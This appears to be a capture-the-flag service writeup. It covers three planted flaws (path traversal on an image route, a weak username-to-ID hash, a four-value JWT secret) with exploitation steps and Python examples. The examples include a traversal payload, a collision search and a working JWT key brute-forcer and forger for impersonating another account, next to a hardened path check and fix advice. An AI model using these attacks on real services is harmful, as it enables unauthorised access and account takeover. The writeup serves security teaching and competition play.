enowars/enowars9-service-only-leveling
Directory traversal in file access

Description: The route /images/(unknown) does not check whether the requested file name contains path components such as .. or /. A request such as /images/../../otheruser/secret.jpg therefore reads files outside the requesting user's own upload directory.

Flag location: The flag is hidden in a JPG file in another user's upload directory.

How to obtain the flag: The player uses the directory traversal to download the other user's secret image. The flag is embedded in that image with steghide; after downloading it, the player extracts the flag with steghide extract.
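The following is an added example, not code from the service: it contrasts the unchecked path join the writeup describes with a hardened version. The upload layout (UPLOAD_ROOT/<user>/<filename>), the UPLOAD_ROOT value and all function names are assumptions; the route's real implementation is not shown on this page.

```python
import posixpath

# Added example, not the service's code. The upload layout
# (UPLOAD_ROOT/<user>/<filename>) and UPLOAD_ROOT itself are assumptions.
UPLOAD_ROOT = "/srv/uploads"


def vulnerable_image_path(user: str, filename: str) -> str:
    """Unchecked join, as the writeup describes the /images route: the
    filename is appended to the user's directory without inspecting it."""
    return posixpath.join(UPLOAD_ROOT, user, filename)


def effective_target(user: str, filename: str) -> str:
    """Where the vulnerable join actually ends up once '..' components are
    collapsed. Used here only to make the escape visible."""
    return posixpath.normpath(vulnerable_image_path(user, filename))


def safe_image_path(user: str, filename: str) -> str:
    """Hardened version: reject separators, dot entries and NUL bytes, then
    verify that both the user directory and the final normalised path stay
    inside the expected tree."""
    if not filename or filename in (".", "..") or any(c in filename for c in "/\\\x00"):
        raise ValueError("invalid filename")
    user_dir = posixpath.normpath(posixpath.join(UPLOAD_ROOT, user))
    # The user name may itself come from attacker-influenced data, so it is
    # contained as well; it must be a real subdirectory of UPLOAD_ROOT.
    if user_dir == UPLOAD_ROOT or posixpath.commonpath([UPLOAD_ROOT, user_dir]) != UPLOAD_ROOT:
        raise ValueError("invalid user")
    candidate = posixpath.normpath(posixpath.join(user_dir, filename))
    # The containment check is the real guard; the character blacklist above
    # only produces a clearer error for the obvious cases.
    if posixpath.commonpath([user_dir, candidate]) != user_dir:
        raise ValueError("path escapes user directory")
    return candidate


def is_allowed(user: str, filename: str) -> bool:
    """Boolean wrapper around safe_image_path for route handlers and tests."""
    try:
        safe_image_path(user, filename)
        return True
    except ValueError:
        return False
```

With this layout the page's payload `../../otheruser/secret.jpg` normalises to `/srv/otheruser/secret.jpg`, i.e. it climbs out of the upload tree entirely; a single `..` lands in another user's directory. Normalising first and then comparing against the intended base directory is what makes the check robust, since a blacklist of `..` and `/` alone misses encodings the framework may decode before the handler runs.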

Collision-prone seed hash function for item IDs

Description: The seed hash function that maps a username to an ItemID uses only simple arithmetic reduced by a small modulus. The output space is therefore small, and a player can deliberately choose a username that produces the same ItemID as another account.

Flag location: The flag is stored as a note (Item Note) on an item whose ItemID is derived from the owner's username by this seed function.

How to obtain the flag: The player registers a username whose ItemID collides with that of the account holding the flag. Once the mapping collides, the player has access to the item's note and can read the flag.
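The following is an added example, not code from the service. The page does not give the actual seed function, only that it is simple arithmetic with a small modulus, so `toy_item_id` is a stand-in with that property (multiplier 31, modulus 256 are assumed constants). The collision search is the technique the writeup describes: enumerate short usernames until one hashes to the victim's ItemID.

```python
import itertools
import string
from typing import Optional

# Added example, not the service's code. The page only says the seed function
# uses simple arithmetic with a small modulus; the multiplier 31 and the
# modulus 256 below are stand-in constants chosen to reproduce that weakness.
MODULUS = 256
MULTIPLIER = 31


def toy_item_id(username: str) -> int:
    """Polynomial rolling hash reduced modulo a small constant: at most
    MODULUS distinct ItemIDs exist, so collisions are unavoidable and cheap."""
    h = 0
    for ch in username:
        h = (h * MULTIPLIER + ord(ch)) % MODULUS
    return h


def find_colliding_username(target_username: str, prefix: str = "atk",
                            max_tail: int = 3) -> Optional[str]:
    """Search usernames of the form prefix + short lowercase tail until one
    hashes to the same ItemID as target_username. With these constants two
    lowercase letters already reach every residue mod 256, so the search
    finishes after at most 26 + 26*26 candidates whatever the prefix is."""
    target = toy_item_id(target_username)
    for length in range(1, max_tail + 1):
        for tail in itertools.product(string.ascii_lowercase, repeat=length):
            candidate = prefix + "".join(tail)
            if candidate != target_username and toy_item_id(candidate) == target:
                return candidate
    return None
```

The fix is not a bigger modulus but not deriving authorisation-relevant identifiers from attacker-chosen input at all: item IDs should be random or database-assigned, and access to a note should be checked against the item's owner, not against whoever happens to hash to the same ID.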

Insecure JWT SECRET_KEY generation

Description: The SECRET_KEY used to sign JWTs is derived predictably: the current time is converted into a string of '0' and '1' characters and only the first two characters are kept. The key space is therefore at most four values (00, 01, 10, 11), so an attacker can reconstruct the key or simply try every candidate.

Flag location: With a correctly forged JWT the attacker can log in as the account that holds the flag, either as a steganographic image or as an item note.

How to obtain the flag: The player reconstructs the SECRET_KEY and uses it to sign a JWT for the target account. This grants access to that account's images and items, so the player can retrieve both the hidden image (for steghide extract) and the note containing the flag.
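The following is an added example, not code from the service: a stdlib-only HS256 JWT implementation used to brute-force the four possible keys against a token the attacker already holds for their own account, then re-sign the claims for the victim. The HS256 algorithm and the `username` claim are assumptions; the page names neither.

```python
import base64
import hashlib
import hmac
import itertools
import json
from typing import Optional

# Added example, not the service's code. It assumes the tokens are HS256 JWTs
# and that the account is identified by a "username" claim; both are
# assumptions, the page names neither the algorithm nor the claim.


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, secret: str) -> str:
    """Mint a compact-serialised HS256 JWT with the standard library only."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header}.{body}".encode("ascii")
    sig = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def verify_hs256(token: str, secret: str) -> Optional[dict]:
    """Return the payload if the signature verifies under secret, else None."""
    try:
        header, body, sig = token.split(".")
    except ValueError:
        return None
    expected = hmac.new(secret.encode(), f"{header}.{body}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig)):
        return None
    return json.loads(_b64url_decode(body))


def candidate_secrets():
    """The writeup's key is two characters of a '0'/'1' string: four values."""
    for bits in itertools.product("01", repeat=2):
        yield "".join(bits)


def recover_secret(token: str) -> Optional[str]:
    """Try every candidate key against a token the attacker legitimately holds."""
    for secret in candidate_secrets():
        if verify_hs256(token, secret) is not None:
            return secret
    return None


def forge_token(own_token: str, target_username: str) -> Optional[str]:
    """Recover the key from our own token, then re-sign the same claims for the
    victim. The claim name "username" is an assumption."""
    secret = recover_secret(own_token)
    if secret is None:
        return None
    claims = dict(verify_hs256(own_token, secret))
    claims["username"] = target_username
    return sign_hs256(claims, secret)
```

Two practical notes. If the converted time is Unix seconds, every value from 2^30 + 2^29 (January 2021) up to 2^31 (January 2038) has the binary prefix 11, so the key is effectively constant rather than merely guessable. And if the conversion is Python's bin(), the string begins with the literal prefix 0b, which would then be the key; add it to the candidate list when reproducing the attack against an unknown implementation.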

License

MIT License
